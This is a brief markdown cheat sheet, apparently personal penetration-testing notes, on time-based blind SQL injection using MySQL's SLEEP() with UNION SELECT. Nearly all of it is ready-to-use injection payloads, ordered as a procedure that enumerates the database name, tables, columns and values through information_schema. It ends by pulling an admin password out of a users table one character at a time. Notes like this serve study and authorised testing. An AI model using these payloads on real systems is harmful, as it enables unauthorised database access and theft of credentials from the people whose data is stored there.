Time-Based Blind SQL Injection

time-based-blind-sqli.md

Time-Based Blind SQL Injection

Indication of a correct query is based on the time the query takes to complete.
This time delay is introduced by using built-in methods such as SLEEP(x) alongside the UNION statement.
The SLEEP() method will only ever get executed upon a successful UNION SELECT statement.

Base query example

/endpoint?query=admin123' 

Attack query example

/endpoint?query=admin123' UNION SELECT SLEEP(5),2 where database() like 'a%';--

Process flow

Cycle through possible table names, when we get a hit on a character then move to the next character and repeat

Start with enum for db name

UNION SELECT SLEEP(5),2 where database() like 'a%';--

After finding db name, enum table name the same way

UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'found_db' and table_name like 'a%';--

Verify found table name

UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'found_db' and table_name='found_table';--

After finding table name, enum possible column names

UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='found_db' and TABLE_NAME='found_table' and COLUMN_NAME like 'a%';

Exclude already discovered ones and repeat

UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='found_db' and TABLE_NAME='found_table' and COLUMN_NAME like 'a%' and COLUMN_NAME !='found_col';

Enum values in found column

UNION SELECT SLEEP(5),2 from found_table where found_col like 'a%

Enum next value found in column: example of a basic users table

UNION SELECT SLEEP(5),2 from users where username='admin' and password like 'a%